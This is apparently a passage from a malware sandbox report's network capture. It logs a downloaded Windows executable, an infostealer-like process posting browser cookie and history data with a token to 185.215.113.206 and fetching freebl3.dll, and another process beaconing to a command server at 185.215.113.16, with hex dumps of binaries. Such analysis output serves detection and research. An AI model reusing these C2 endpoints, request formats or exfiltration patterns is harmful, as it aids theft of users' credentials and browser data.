                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:57 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 4494336
                                                                                                                                                                                                                                                  Last-Modified: Fri, 03 Jan 2025 08:49:17 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "6777a48d-449400"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 c4 35 72 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 8c 4d 00 00 82 77 00 00 32 00 00 00 50 ca 00 00 10 00 00 00 a0 4d 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 80 ca 00 00 04 00 00 c0 4b 45 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f c0 74 00 73 00 00 00 00 b0 74 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 82 77 00 88 06 00 00 a8 32 ca 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 32 ca 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL5rg(Mw2PM@KE@ _tstw2X2 t(@.rsrct(@.idata t(@ 9t(@hnsygimbp(@kduywxtx@lD@.taggant0P"rD@
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:57.700238943 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:57.700257063 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:57.700280905 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:57.700293064 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:57.700303078 CET672INData Raw: 8d ed 4d 77 ec 2a 4e 13 a8 32 9c 57 95 fc 57 d2 33 d1 d7 1b 4e 90 c8 53 5a bf 10 ce e5 32 ba 97 33 fc a8 2b 6e a1 ca 4f 64 97 7b fe 43 83 2b a4 26 33 b4 6a 8b 58 32 14 02 6c 24 31 04 e9 38 b1 61 7b 8b 9a 11 51 aa c9 91 8b 1d 3a 37 42 b1 1c d8 65
                                                                                                                                                                                                                                                  Data Ascii: Mw*N2WW3NSZ23+nOd{C+&3jX2l$18a{Q:7BeMPYx4KSM4\nN7l&L4x,zWs6dKI}TW[,Q[O!7G/JKQZ^Y[>j:E:xK44[lo3wA+K
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:57.700323105 CET1236INData Raw: 82 22 64 77 d7 d8 08 c4 64 d6 7c c4 f3 f7 cc 85 b6 16 4a 07 ae dd ad 4f ec 8b fd c7 96 bf 28 ef af b3 c3 6e 80 fb 86 49 85 34 ea 47 ba 5c 42 fe ce 8a 1d 4d 10 d4 db 7b c5 87 7b af d5 f3 89 57 aa b5 bf 9f f9 f7 bd 9c 3d 37 02 5f a1 0e 51 ce 40 2f
                                                                                                                                                                                                                                                  Data Ascii: "dwd|JO(nI4G\BM{{W=7_Q@/}";XA;S.w\Agx':CR|imMu~l=sI:kxF[g'F3(}!"S(6CR`v'6Wy:pn@t{mdvJVkw
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:57.700392008 CET1236INData Raw: d6 9b a1 de b7 dc fb 27 ca 07 a3 60 16 06 e6 ba b2 d1 8d 5e 69 47 ca 9c d7 4b be 68 41 a2 10 6f ac 9c d1 53 fc 32 4b 46 f0 90 b1 a8 54 3c 0e 87 8a b6 15 31 f3 76 1e 20 68 80 9d c9 f6 06 dd 16 58 52 7a 36 b0 3d b5 c2 8c ce 05 f1 23 73 4a 24 33 26
                                                                                                                                                                                                                                                  Data Ascii: '`^iGKhAoS2KFT<1v hXRz6=#sJ$3&CxS U7Ec6*`7o@u0mr z.xG$C[tC-N:k94T]9<1N1,'\coPn<rcP609LJ9C9LRF:[
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:57.700412035 CET448INData Raw: f8 42 5b 0d ad 3a f3 4d 77 d2 8c 97 92 61 c1 29 08 1f 76 9c b4 7b 98 8a 53 92 35 97 e6 b6 8d dd 80 e3 7e 58 7d 04 88 97 e2 05 a9 42 c5 c8 b0 ee 07 af 32 83 30 d0 99 43 a6 09 b7 77 f7 51 1b 97 51 70 4e 8b 9a e3 70 db 80 78 e3 f2 45 0b 73 b7 72 78
                                                                                                                                                                                                                                                  Data Ascii: B[:Mwa)v{S5~X}B20CwQQpNpxEsrxr0(B_gH21E4ww4t02%Wv$v7#@si5AoFCc)W[ASV1Ry| a_4X*Dd4(g2Dd*00Y(
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:57.700427055 CET1236INData Raw: 4a 69 e9 30 1e 34 81 fd a8 f7 1a 4d d1 67 0e c8 68 0b de 67 db 94 50 0e 5a 5d 12 6c 9e 37 19 bf a1 fc a7 a7 c0 29 1e 7f 74 35 4a 8d 0e c1 13 7e 59 95 4e 06 68 c4 01 f2 aa b8 e3 d4 d9 a1 45 26 b5 9b 00 eb 50 f8 7d e1 42 b5 c4 bc d0 90 8c 03 0f 1f
                                                                                                                                                                                                                                                  Data Ascii: Ji04MghgPZ]l7)t5J~YNhE&P}B(qhnPOcbx}@!q2ZOR-( NOgm1RhQJ?DHb~T"+6sj>O"a|'x3.hn
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:57.705245018 CET1236INData Raw: c3 38 c6 72 fa fb 79 59 06 5c 9a a2 10 07 be 9e 85 37 bd 21 04 46 1a 9c b7 e4 d6 53 2f 95 79 06 d5 4a 9a 51 8c 83 cd 23 a4 e6 13 98 dd 97 f4 61 cc 5a 69 bf 59 37 a2 6b 77 f9 3e 37 08 aa a0 7d 70 15 5f bb 90 79 36 77 08 a7 76 79 5f b1 42 d1 90 53
                                                                                                                                                                                                                                                  Data Ascii: 8ryY\7!FS/yJQ#aZiY7kw>7}p_y6wvy_BS /jc6A*jtP1Iqx8"lS`vZl2YeC57~[=YlZlY[]S+Gp5CK\Y4Aw~a')LA?Oc(m0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  19192.168.2.450084185.215.113.206806704C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:02.534360886 CET202OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----FBFIJJEBKEBFCBGDAEGD
                                                                                                                                                                                                                                                  Host: 185.215.113.206
                                                                                                                                                                                                                                                  Content-Length: 991
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:02.534387112 CET991OUTData Raw: 2d 2d 2d 2d 2d 2d 46 42 46 49 4a 4a 45 42 4b 45 42 46 43 42 47 44 41 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 31 31 62 38 35
                                                                                                                                                                                                                                                  Data Ascii: ------FBFIJJEBKEBFCBGDAEGDContent-Disposition: form-data; name="token"b11b8554fefe04ed4a6e76d1866dc81fdd1ae8ecf1a83a5ab394ca1f0a6a257349a32477------FBFIJJEBKEBFCBGDAEGDContent-Disposition: form-data; name="file_name"Y29va2llc1xHb
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:03.817002058 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:51:03 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:03.910860062 CET203OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----KJEHJKJEBGHJJKEBGIEC
                                                                                                                                                                                                                                                  Host: 185.215.113.206
                                                                                                                                                                                                                                                  Content-Length: 1451
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:03.910860062 CET1451OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 31 31 62 38 35
                                                                                                                                                                                                                                                  Data Ascii: ------KJEHJKJEBGHJJKEBGIECContent-Disposition: form-data; name="token"b11b8554fefe04ed4a6e76d1866dc81fdd1ae8ecf1a83a5ab394ca1f0a6a257349a32477------KJEHJKJEBGHJJKEBGIECContent-Disposition: form-data; name="file_name"aGlzdG9yeVxHb
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:04.846790075 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:51:04 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:04.978533030 CET565OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----GHDBKFHIJKJKECAAAECA
                                                                                                                                                                                                                                                  Host: 185.215.113.206
                                                                                                                                                                                                                                                  Content-Length: 363
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 2d 2d 2d 2d 2d 2d 47 48 44 42 4b 46 48 49 4a 4b 4a 4b 45 43 41 41 41 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 31 31 62 38 35 35 34 66 65 66 65 30 34 65 64 34 61 36 65 37 36 64 31 38 36 36 64 63 38 31 66 64 64 31 61 65 38 65 63 66 31 61 38 33 61 35 61 62 33 39 34 63 61 31 66 30 61 36 61 32 35 37 33 34 39 61 33 32 34 37 37 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 42 4b 46 48 49 4a 4b 4a 4b 45 43 41 41 41 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 42 4b 46 48 49 4a 4b 4a 4b 45 43 41 41 41 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: ------GHDBKFHIJKJKECAAAECAContent-Disposition: form-data; name="token"b11b8554fefe04ed4a6e76d1866dc81fdd1ae8ecf1a83a5ab394ca1f0a6a257349a32477------GHDBKFHIJKJKECAAAECAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GHDBKFHIJKJKECAAAECAContent-Disposition: form-data; name="file"------GHDBKFHIJKJKECAAAECA--
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:05.766679049 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:51:05 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:06.020755053 CET565OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----GDBFBFCBFBKECAAKJKFB
                                                                                                                                                                                                                                                  Host: 185.215.113.206
                                                                                                                                                                                                                                                  Content-Length: 363
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 31 31 62 38 35 35 34 66 65 66 65 30 34 65 64 34 61 36 65 37 36 64 31 38 36 36 64 63 38 31 66 64 64 31 61 65 38 65 63 66 31 61 38 33 61 35 61 62 33 39 34 63 61 31 66 30 61 36 61 32 35 37 33 34 39 61 33 32 34 37 37 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: ------GDBFBFCBFBKECAAKJKFBContent-Disposition: form-data; name="token"b11b8554fefe04ed4a6e76d1866dc81fdd1ae8ecf1a83a5ab394ca1f0a6a257349a32477------GDBFBFCBFBKECAAKJKFBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GDBFBFCBFBKECAAKJKFBContent-Disposition: form-data; name="file"------GDBFBFCBFBKECAAKJKFB--
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:06.860002041 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:51:06 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=97
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:07.017121077 CET94OUTGET /68b591d6548ec281/freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                                  Host: 185.215.113.206
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:07.246511936 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:51:07 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                  Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                  ETag: "a7550-5e7e950876500"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Content-Length: 685392
                                                                                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                  Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:07.246531010 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b
                                                                                                                                                                                                                                                  Data Ascii: UhOt8]h1]UWVEtu}UMt"0(h&40jVjjRQP?^_]USWVhO?t0
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:07.246545076 CET248INData Raw: 55 07 08 00 83 c4 08 eb ce cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8 83 ec 58 89 4c 24 2c 8b 7d 1c a1 b4 30 0a 10 31 e8 89 44 24 50 c7 44 24 3c 10 00 00 00 83 ff 18 72 19 89 f8 83 e0 07 75 12 8d 47 f8 3b 45 14 76 14 68 03 e0 ff
                                                                                                                                                                                                                                                  Data Ascii: UUSWVXL$,}01D$PD$<ruG;Evhh|$,}uT$4D$0P|OL$8PVS'D$@?@L$L$D$D$D$$
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:07.246553898 CET1236INData Raw: 00 00 31 d2 31 c9 89 5c 24 28 eb 24 89 c7 8b 44 24 1c 83 c0 01 83 f8 06 8b 54 24 18 8b 4c 24 14 0f 84 e2 01 00 00 89 44 24 1c 8a 44 24 07 04 ff 8b 74 24 38 0f 1f 84 00 00 00 00 00 89 c3 88 44 24 07 8b 44 24 40 89 cf 89 4c 24 14 0f b6 c9 c1 e1 18
                                                                                                                                                                                                                                                  Data Ascii: 11\$($D$T$L$D$D$t$8D$D$@L$T$|$ L$$\$\$T$1%1%1T$D|$@|$t\$(D$\$(sFD$,D$
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:07.246566057 CET1236INData Raw: 45 dc 89 ca f7 da c1 fa 1f f7 d2 8b 45 1c 80 7c 30 f7 01 19 db 09 d3 b8 01 00 00 00 29 c8 c1 f8 1f 8b 55 1c 80 7c 32 f6 01 19 d2 f7 d0 09 c2 21 da 21 fa b8 02 00 00 00 29 c8 c1 f8 1f f7 d0 8b 5d 1c 80 7c 33 f5 01 19 ff 09 c7 b8 03 00 00 00 29 c8
                                                                                                                                                                                                                                                  Data Ascii: EE|0)U|2!!)]|3)|3!)}|7!!)U|2)|2!!)M|1t/EU;U]w"1E9t:RVP -
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:07.246577978 CET448INData Raw: 45 08 c7 47 08 00 00 00 00 89 47 04 8b 48 04 ff 15 00 80 0a 10 ff d1 89 07 85 c0 74 31 8b 55 0c 89 f9 ff 75 14 ff 75 10 e8 17 fd ff ff 83 c4 08 85 c0 74 2c 8b 1f 85 db 74 14 8b 47 04 8b 48 0c ff 15 00 80 0a 10 6a 01 53 ff d1 83 c4 08 c7 47 08 01
                                                                                                                                                                                                                                                  Data Ascii: EGGHt1Uuut,tGHjSGW:G^_[]USWVUM]u>F9t:NVFMUtHHjWhjV4%tUVPdnFEFEF
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:07.246829987 CET1236INData Raw: 10 57 56 53 ff d1 83 c4 0c 5e 5f 5b 5d c3 cc cc cc cc cc cc 55 89 e5 53 57 56 50 8b 4d 14 8b 7d 08 8b 47 04 39 08 76 17 68 05 e0 ff ff e8 b5 fa 07 00 83 c4 04 b8 ff ff ff ff e9 99 00 00 00 8b 75 10 8b 48 18 8b 1f ff 15 00 80 0a 10 ff 75 14 56 ff
                                                                                                                                                                                                                                                  Data Ascii: WVS^_[]USWVPM}G9vhuHuVuSO;upISEGHpVSu7GHES]SV7GHuuSV1^_[]USWVPh
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:07.246843100 CET1236INData Raw: 55 89 e5 53 57 56 83 ec 34 89 4d f0 8b 45 14 89 45 d8 39 45 0c 73 17 68 03 e0 ff ff e8 f2 f5 07 00 83 c4 04 b8 ff ff ff ff e9 79 08 00 00 89 55 e4 8b 7d 10 8b 5d 08 8b 45 f0 8a 88 00 01 00 00 8a b0 01 01 00 00 83 7d 14 07 0f 87 81 01 00 00 83 7d
                                                                                                                                                                                                                                                  Data Ascii: USWV4MEE9EshyU}]E}}aM}$7$7u2M$E}$7$7u]S2MQE}$7$7u
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:07.246853113 CET48INData Raw: 66 0f eb cf 66 0f 72 f4 17 66 0f fe e5 f3 0f 5b e4 66 0f 70 ea f5 66 0f f4 d4 66 0f 70 e4 f5 66 0f f4 e5 66 0f 70 d2 e8 66 0f 70 e4 e8 66 0f 62
                                                                                                                                                                                                                                                  Data Ascii: ffrf[fpffpffpfpfb


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  20192.168.2.450085185.215.113.16802800C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:03.129280090 CET184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  Host: 185.215.113.16
                                                                                                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 64 31 3d 31 30 31 30 37 35 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                  Data Ascii: d1=1010750001&unit=246122658369
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:03.839302063 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:51:02 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  21192.168.2.450086185.215.113.16802800C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:04.040644884 CET156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  Host: 185.215.113.16
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                  Data Ascii: st=s
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:04.742556095 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:51:03 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 1 0
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:04.798325062 CET308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  Host: 185.215.113.16
                                                                                                                                                                                                                                                  Content-Length: 154
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
